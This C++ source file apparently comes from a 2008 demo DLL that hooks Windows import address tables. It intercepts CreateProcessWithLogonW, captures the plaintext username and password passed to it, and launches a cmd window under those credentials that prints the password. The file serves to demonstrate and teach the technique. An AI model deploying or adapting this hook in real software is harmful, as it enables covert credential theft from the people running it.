//////////////////////////////////////////////////////////////////////////////
//
// This source code is part of IATHook, 
//    a small demo of an Import Address Table Hooker
//
//                                   (c) Kay Bruns (http://kay-bruns.de), 2008
//////////////////////////////////////////////////////////////////////////////
#define _WIN32_WINNT 0x0500
#define WINVER       0x0500

#include <windows.h>
#include <Psapi.h>
#include <ShlWapi.h>
#include <LMAccess.h>

#include <list>
#include <algorithm>
#include <iterator>

#include "DLLMain.h"

#pragma comment(lib,"Advapi32.lib")
#pragma comment(lib,"ShlWapi.lib")
#pragma comment(lib,"PSAPI.lib")

#include <tchar.h>
void TRACEx(LPCTSTR s,...)
{
  TCHAR S[1024]={0};
  int len=0;
  va_list va;
  va_start(va,s);
  if (_vstprintf(&S[len],s,va)>=1024)
    DebugBreak();
  va_end(va);
  OutputDebugString(S);
}

//Function Prototypes:
typedef HMODULE (WINAPI* lpLoadLibraryA)(LPCSTR);
typedef HMODULE (WINAPI* lpLoadLibraryW)(LPCWSTR);
typedef HMODULE (WINAPI* lpLoadLibraryExA)(LPCSTR,HANDLE,DWORD);
typedef HMODULE (WINAPI* lpLoadLibraryExW)(LPCWSTR,HANDLE,DWORD);
typedef FARPROC (WINAPI* lpGetProcAddress)(HMODULE,LPCSTR);
typedef BOOL (WINAPI* lpFreeLibrary)(HMODULE);
typedef VOID (WINAPI* lpFreeLibraryAndExitThread)(HMODULE,DWORD);

typedef BOOL (WINAPI* lpCreateProcessWithLogonW)(LPCWSTR,LPCWSTR,LPCWSTR,DWORD,
                                                 LPCWSTR,LPWSTR,DWORD,LPVOID,
                                                 LPCWSTR,LPSTARTUPINFOW,
                                                 LPPROCESS_INFORMATION);

//Forward decl:
BOOL WINAPI CreateProcWithLogonW(LPCWSTR,LPCWSTR,LPCWSTR,DWORD,LPCWSTR,LPWSTR,DWORD,
                                 LPVOID,LPCWSTR,LPSTARTUPINFOW,LPPROCESS_INFORMATION);

HMODULE WINAPI LoadLibA(LPCSTR);
HMODULE WINAPI LoadLibW(LPCWSTR);
HMODULE WINAPI LoadLibExA(LPCSTR,HANDLE,DWORD);
HMODULE WINAPI LoadLibExW(LPCWSTR,HANDLE,DWORD);

FARPROC WINAPI GetProcAddr(HMODULE,LPCSTR);

BOOL WINAPI FreeLib(HMODULE);
VOID WINAPI FreeLibAndExitThread(HMODULE,DWORD);

static lpGetProcAddress orgGPA=NULL;

typedef std::list<HMODULE> ModList;

ModList g_ModList;

//Hook Descriptor class
class CHookDescriptor
{
public:
  LPCSTR DllName;
  LPCSTR FuncName;
  PROC newFunc;
  PROC orgFunc;
  CHookDescriptor(LPCSTR Dll,LPCSTR Func,PROC nFunc)
  {
    DllName=Dll;
    FuncName=Func;
    newFunc=nFunc;
    orgFunc=0;
  }
  PROC OrgFunc()
  {
    if (orgFunc)
      return orgFunc;
    if (!orgGPA)
      orgGPA=GetProcAddr;
    orgFunc=orgGPA(GetModuleHandleA(DllName),FuncName);
    return orgFunc;
  }
}; 

//Standard Hooks: These must be implemented!
static CHookDescriptor hkLdLibA  ("kernel32.dll","LoadLibraryA",(PROC)LoadLibA);
static CHookDescriptor hkLdLibW  ("kernel32.dll","LoadLibraryW",(PROC)LoadLibW);
static CHookDescriptor hkLdLibXA ("kernel32.dll","LoadLibraryExA",(PROC)LoadLibExA);
static CHookDescriptor hkLdLibXW ("kernel32.dll","LoadLibraryExW",(PROC)LoadLibExW);
static CHookDescriptor hkGetPAdr ("kernel32.dll","GetProcAddress",(PROC)GetProcAddr);
static CHookDescriptor hkFreeLib ("kernel32.dll","FreeLibrary",(PROC)FreeLib);
static CHookDescriptor hkFrLibXT ("kernel32.dll","FreeLibraryAndExitThread",(PROC)FreeLibAndExitThread);
//User Hooks:
static CHookDescriptor hkCrPWLOW ("Advapi32.dll","CreateProcessWithLogonW",(PROC)CreateProcWithLogonW);

//Functions that, if present in the IAT, cause the module to be hooked
static CHookDescriptor* need_hdt[]=
{
  &hkCrPWLOW
};

static CHookDescriptor* hdt[]=
{
  &hkLdLibA,
  &hkLdLibW, 
  &hkLdLibXA, 
  &hkLdLibXW, 
//  &hkGetPAdr, 
  &hkFreeLib, 
  &hkFrLibXT, 
  &hkCrPWLOW
};

#define countof(b) sizeof(b)/sizeof(b[0])

//relative pointers in PE images
#define RelPtr(_T,pe,rpt) (_T)( (DWORD_PTR)(pe)+(DWORD_PTR)(rpt))

//returns true if DllName is one to be hooked up
BOOL DoHookDll(char* DllName)
{
  for(int i=0;i<countof(hdt);i++)
    if (stricmp(hdt[i]->DllName,DllName)==0)
      return true;
  return false;
}

//returns newFunc if DllName->ImpName is one to be hooked up
PROC DoHookFn(char* DllName,char* ImpName,PROC* orgFunc)
{
  if(IsBadReadPtr(DllName,1)||IsBadReadPtr(ImpName,1))
    return 0;
  if(*DllName && *ImpName)
    for(int i=0;i<countof(hdt);i++)
      if (stricmp(hdt[i]->DllName,DllName)==0)
        if (stricmp(hdt[i]->FuncName,ImpName)==0)
        {
          if(orgFunc)
            *orgFunc=hdt[i]->OrgFunc();
          return hdt[i]->newFunc;
        }
  return false;
}

PROC DoHookFn(char* DllName,PROC orgFunc)
{
  if(IsBadReadPtr(DllName,1)||IsBadReadPtr(orgFunc,1))
    return 0;
  if(*DllName)
    for(int i=0;i<countof(hdt);i++)
      if (stricmp(hdt[i]->DllName,DllName)==0)
        if (hdt[i]->OrgFunc()==orgFunc)
          return hdt[i]->newFunc;
  return false;
}

PROC GetOrgFn(char* DllName,char* ImpName)
{
  if(IsBadReadPtr(DllName,1)||IsBadReadPtr(ImpName,1))
    return 0;
  if(*DllName && *ImpName)
    for(int i=0;i<countof(hdt);i++)
      if (stricmp(hdt[i]->DllName,DllName)==0)
        if (stricmp(hdt[i]->FuncName,ImpName)==0)
          return hdt[i]->OrgFunc();
  return false;
}

//Detect if a module is using CreateProcess, if yes, it needs to be hooked
bool NeedHookFn(char* DllName,char* ImpName,void* orgFunc)
{
  if(IsBadReadPtr(DllName,1)||IsBadReadPtr(ImpName,1)||IsBadReadPtr(ImpName,1))
    return 0;
  if(*DllName && *ImpName)
    for(int i=0;i<countof(need_hdt);i++)
      if (stricmp(need_hdt[i]->DllName,DllName)==0)
        if (stricmp(need_hdt[i]->FuncName,ImpName)==0)
          return need_hdt[i]->OrgFunc()==orgFunc;
  return false;
}

DWORD HookIAT(HMODULE hMod,PIMAGE_IMPORT_DESCRIPTOR pID)
{
  DWORD nHooked=0;
//  char fmod[MAX_PATH]={0};
//  {
//    GetModuleFileNameA(0,fmod,MAX_PATH);
//    PathStripPathA(fmod);
//    strcat(fmod,": ");
//    char* p=&fmod[strlen(fmod)];
//    GetModuleFileNameA(hMod,p,MAX_PATH);
//    PathStripPathA(p);
//  }
//  TRACEx("IATHook.dll: HookIAT(%s[%x])\n",fmod,hMod);
  for(;pID->Name;pID++) 
  {
    char* DllName=RelPtr(char*,hMod,pID->Name);
    if(DoHookDll(DllName))
    {
      PIMAGE_THUNK_DATA pOrgThunk=RelPtr(PIMAGE_THUNK_DATA,hMod,pID->OriginalFirstThunk);
      PIMAGE_THUNK_DATA pThunk=RelPtr(PIMAGE_THUNK_DATA,hMod,pID->FirstThunk);
      for(;(pThunk->u1.Function)&&(pOrgThunk->u1.Function);pOrgThunk++,pThunk++)
        if ((pOrgThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG )==0)
        {
          PIMAGE_IMPORT_BY_NAME pBN=RelPtr(PIMAGE_IMPORT_BY_NAME,hMod,pOrgThunk->u1.AddressOfData);
          PROC orgFunc = 0;
          PROC newFunc = DoHookFn(DllName,(char*)pBN->Name,&orgFunc);
          //PROC newFunc = DoHookFn(DllName,(PROC)pThunk->u1.Function);
          if (newFunc && orgFunc && (pThunk->u1.Function==(DWORD_PTR)orgFunc))
          {
            __try
            {
              //MEMORY_BASIC_INFORMATION mbi;
              //if (VirtualQuery(&pThunk->u1.Function, &mbi, sizeof(MEMORY_BASIC_INFORMATION))!=0)
              {
                DWORD oldProt=PAGE_READWRITE;
                if(VirtualProtect(&pThunk->u1.Function,sizeof(pThunk->u1.Function),PAGE_EXECUTE_WRITECOPY,&oldProt))
                {
//                TRACEx("IATHook.dll: HookFunc(%s):%s,%s (%x->%x) newProt:%x; oldProt:%x MBI:(%X,%X,%X)\n",
//                  fmod,DllName,pBN->Name,pThunk->u1.Function,newFunc,PAGE_EXECUTE_WRITECOPY,oldProt,
//                  mbi.AllocationProtect,mbi.State,mbi.Type);
                  //pThunk->u1.Function = (DWORD_PTR)newFunc;
//                  FlushInstructionCache(GetCurrentProcess(),&pThunk->u1.Function,sizeof(pThunk->u1.Function));
                  InterlockedExchangePointer((VOID**)&pThunk->u1.Function,newFunc);
                  VirtualProtect(&pThunk->u1.Function,sizeof(pThunk->u1.Function), oldProt, &oldProt);
//                  FlushInstructionCache(GetCurrentProcess(),&pThunk->u1.Function,sizeof(pThunk->u1.Function));
                  nHooked++;
                }
              }
            }
            __except(1)
            {
              TRACEx("FATAL: Exception in HookIAT\n");
            }
          }
        }
    }//if(DoHookDll(DllName))
  }//for(;pID->Name;pID++) 
  return nHooked;
}

DWORD Hook(HMODULE hMod)
{
  //Detect if a module is using CreateProcess, if yes, it needs to be hooked
  if(hMod==l_hInst)
    return 0;
  {
    char f0[MAX_PATH]={0};
    char f1[MAX_PATH]={0};
    GetModuleFileNameA(hMod,f0,MAX_PATH);
    GetModuleFileNameA(l_hInst,f0,MAX_PATH);
    if (stricmp(f0,f1)==0)
      return 0;
  }
  // check "MZ" and DOS Header size
  if(IsBadReadPtr(hMod,sizeof(IMAGE_DOS_HEADER))
    || (((PIMAGE_DOS_HEADER)hMod)->e_magic!=IMAGE_DOS_SIGNATURE))
    return 0;
  // check "PE" and DOS Header size
  PIMAGE_NT_HEADERS pNTH = RelPtr(PIMAGE_NT_HEADERS,hMod,((PIMAGE_DOS_HEADER)hMod)->e_lfanew);
  if(IsBadReadPtr(pNTH, sizeof(IMAGE_NT_HEADERS)) ||(pNTH->Signature != IMAGE_NT_SIGNATURE))
    return 0;
  //the right header?
#ifdef _WIN64
  if(pNTH->FileHeader.Machine!=IMAGE_FILE_MACHINE_AMD64)
    return 0;
#else _WIN64
  if(pNTH->FileHeader.Machine!=IMAGE_FILE_MACHINE_I386)
    return 0;
#endif _WIN64
  if(pNTH->FileHeader.SizeOfOptionalHeader!=sizeof(IMAGE_OPTIONAL_HEADER))
    return 0;
  //parse IAT
  DWORD_PTR va=pNTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
  if(va==0) 
    return false;
  PIMAGE_IMPORT_DESCRIPTOR pID = RelPtr(PIMAGE_IMPORT_DESCRIPTOR,hMod,va);
  for(;pID->Name;pID++) 
  {
    char* DllName=RelPtr(char*,hMod,pID->Name);
    if(DoHookDll(DllName))
    {
      PIMAGE_THUNK_DATA pOrgThunk=RelPtr(PIMAGE_THUNK_DATA,hMod,pID->OriginalFirstThunk);
      PIMAGE_THUNK_DATA pThunk=RelPtr(PIMAGE_THUNK_DATA,hMod,pID->FirstThunk);
      for(;(pThunk->u1.Function)&&(pOrgThunk->u1.Function);pOrgThunk++,pThunk++)
        if ((pOrgThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG )==0)
        {
          PIMAGE_IMPORT_BY_NAME pBN=RelPtr(PIMAGE_IMPORT_BY_NAME,hMod,pOrgThunk->u1.AddressOfData);
          if(NeedHookFn(DllName,(char*)pBN->Name,(void*)pThunk->u1.Function))
            return HookIAT(hMod,pID);
        }
    }//if(DoHookDll(DllName))
  }//for(;pID->Name;pID++) 
  return false;
}

DWORD HookModules()
{
  HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS,TRUE,GetCurrentProcessId());
  if (!hProc)
  {
    TRACEx("HookModules(): OpenProcess failed\n");
    return 0;
  }
  DWORD Siz=0;
  DWORD nHooked=0;
  EnumProcessModules(hProc,0,0,&Siz);
  HMODULE* hMod=Siz?(HMODULE*)malloc(Siz):0;
  if(hMod)
  {
    DWORD n=Siz/sizeof(HMODULE);
    EnumProcessModules(hProc,hMod,Siz,&Siz);
    std::sort(hMod,hMod+n);
    ModList newMods;
    //get new hModules
    std::set_difference(hMod,hMod+n,g_ModList.begin(),g_ModList.end(),std::back_inserter(newMods));
    //Hook new hModules
    for(ModList::iterator it=newMods.begin();it!=newMods.end();++it)
      nHooked+=Hook(*it);
    //merge new hModules to list
    g_ModList.merge(newMods);
    free(hMod);
  }
  CloseHandle(hProc);
  return nHooked;
}

BOOL WINAPI CreateProcWithLogonW(LPCWSTR lpUsername,LPCWSTR lpDomain,LPCWSTR lpPassword,
    DWORD dwLogonFlags,LPCWSTR lpApplicationName,LPWSTR lpCommandLine,DWORD dwCreationFlags,
    LPVOID lpEnvironment,LPCWSTR lpCurrentDirectory,LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation)
{
  DWORD cf=CREATE_SUSPENDED|dwCreationFlags;
  BOOL b=((lpCreateProcessWithLogonW)hkCrPWLOW.orgFunc)(lpUsername,lpDomain,
    lpPassword,dwLogonFlags,lpApplicationName,lpCommandLine,cf,lpEnvironment,
    lpCurrentDirectory,lpStartupInfo,lpProcessInformation);
  if (b)
  {
    //Process is suspended...
    //start cmd as user to tell we got the password
    WCHAR user[MAX_PATH]={0};
    if (lpDomain && *lpDomain)
      swprintf(user,L"%s\\",lpDomain);
    wcscat(user,lpUsername);
    STARTUPINFOW si={0};
    PROCESS_INFORMATION pi;
    si.cb = sizeof(si);
    WCHAR cmd[4096];
    swprintf(cmd,L"cmd.exe /D /T:4E /K "
      L"@echo Hello! The Password for User \"%s\" is \"%s\" & "
      L"@echo This process is running with these credentials :-)) & "
      L"@echo If I where a virus, would I be lucky?",
      user,lpPassword);
    ((lpCreateProcessWithLogonW)hkCrPWLOW.orgFunc)(lpUsername,lpDomain,
      lpPassword,LOGON_WITH_PROFILE,NULL,cmd,CREATE_UNICODE_ENVIRONMENT,NULL,
      lpCurrentDirectory,&si,&pi);
    {
      CloseHandle(pi.hThread);
      CloseHandle(pi.hProcess);
    }
    //Resume main thread:
    if ((CREATE_SUSPENDED & dwCreationFlags)==0)
      ResumeThread(lpProcessInformation->hThread);
  }
  return b;
}


CRITICAL_SECTION g_HookCs;

FARPROC WINAPI GetProcAddr(HMODULE hModule,LPCSTR lpProcName)
{
  char f[MAX_PATH]={0};
  GetModuleFileNameA(hModule,f,MAX_PATH);
  PathStripPathA(f);
  PROC p=0;
  p=DoHookFn(f,(char*)lpProcName,NULL);
  SetLastError(NOERROR);
  if(!p)
    p=((lpGetProcAddress)hkGetPAdr.OrgFunc())(hModule,lpProcName);
  return p;
}

HMODULE WINAPI LoadLibA(LPCSTR lpLibFileName)
{
  EnterCriticalSection(&g_HookCs);
  HMODULE hMOD=((lpLoadLibraryA)hkLdLibA.orgFunc)(lpLibFileName);
  DWORD dwe=GetLastError();
  if(hMOD)
    HookModules();
  LeaveCriticalSection(&g_HookCs);
  SetLastError(dwe);
  return hMOD;
}

HMODULE WINAPI LoadLibW(LPCWSTR lpLibFileName)
{
  EnterCriticalSection(&g_HookCs);
  HMODULE hMOD=((lpLoadLibraryW)hkLdLibW.orgFunc)(lpLibFileName);
  DWORD dwe=GetLastError();
  if(hMOD)
    HookModules();
  LeaveCriticalSection(&g_HookCs);
  SetLastError(dwe);
  return hMOD;
}

HMODULE WINAPI LoadLibExA(LPCSTR lpLibFileName,HANDLE hFile,DWORD dwFlags)
{
  EnterCriticalSection(&g_HookCs);
  HMODULE hMOD=((lpLoadLibraryExA)hkLdLibXA.orgFunc)(lpLibFileName,hFile,dwFlags);
  DWORD dwe=GetLastError();
  if(hMOD)
    HookModules();
  LeaveCriticalSection(&g_HookCs);
  SetLastError(dwe);
  return hMOD;
}

HMODULE WINAPI LoadLibExW(LPCWSTR lpLibFileName,HANDLE hFile,DWORD dwFlags)
{
  EnterCriticalSection(&g_HookCs);
  DWORD dwe=GetLastError();
  HMODULE hMOD=((lpLoadLibraryExW)hkLdLibXW.orgFunc)(lpLibFileName,hFile,dwFlags);
  if(hMOD)
    HookModules();
  LeaveCriticalSection(&g_HookCs);
  SetLastError(dwe);
  return hMOD;
}

BOOL WINAPI FreeLib(HMODULE hLibModule)
{
  //The DLL must not be unloaded while the process is running!
  if (hLibModule==l_hInst)
  {
#ifdef _DEBUG
    char fmod[MAX_PATH]={0};
    {
      GetModuleFileNameA(0,fmod,MAX_PATH);
      PathStripPathA(fmod);
      strcat(fmod,": ");
      char* p=&fmod[strlen(fmod)];
      GetModuleFileNameA(hLibModule,p,MAX_PATH);
      PathStripPathA(p);
    }
    TRACEx("IATHook.dll: BLOCKING FreeLibrary (%s[%x])---------------------------------\n",fmod,hLibModule);
#endif _DEBUG
    SetLastError(NOERROR);
    return true;
  }
  SetLastError(NOERROR);
  EnterCriticalSection(&g_HookCs);
  BOOL bRet=((lpFreeLibrary)hkFreeLib.orgFunc)(hLibModule);
  LeaveCriticalSection(&g_HookCs);
  return bRet;
}

VOID WINAPI FreeLibAndExitThread(HMODULE hLibModule,DWORD dwExitCode)
{
  //The DLL must not be unloaded while the process is running!
  if (hLibModule!=l_hInst)
  {
    EnterCriticalSection(&g_HookCs);
    LeaveCriticalSection(&g_HookCs);
    ((lpFreeLibraryAndExitThread)hkFrLibXT.orgFunc)(hLibModule,dwExitCode);
    return;
  }
#ifdef _DEBUG
  char fmod[MAX_PATH]={0};
  {
    GetModuleFileNameA(0,fmod,MAX_PATH);
    PathStripPathA(fmod);
    strcat(fmod,": ");
    char* p=&fmod[strlen(fmod)];
    GetModuleFileNameA(hLibModule,p,MAX_PATH);
    PathStripPathA(p);
  }
  TRACEx("IATHook.dll: BLOCKING FreeLibAndExitThread (%s[%x])---------------------------------\n",fmod,hLibModule);
#endif _DEBUG
  SetLastError(NOERROR);
  ExitThread(dwExitCode);
}

BOOL g_IATInit=FALSE;
void LoadHooks()
{
  if (g_IATInit)
    return;
  g_IATInit=TRUE;
  InitializeCriticalSection(&g_HookCs);
  EnterCriticalSection(&g_HookCs);
  orgGPA=GetProcAddress;
  for(int i=0;i<countof(hdt);i++)
    PROC p=hdt[i]->OrgFunc();
  HookModules();
  LeaveCriticalSection(&g_HookCs);
}

void UnloadHooks()
{
  if(g_IATInit)
  {
    EnterCriticalSection(&g_HookCs);
    LeaveCriticalSection(&g_HookCs);
    DeleteCriticalSection(&g_HookCs);
  }
}

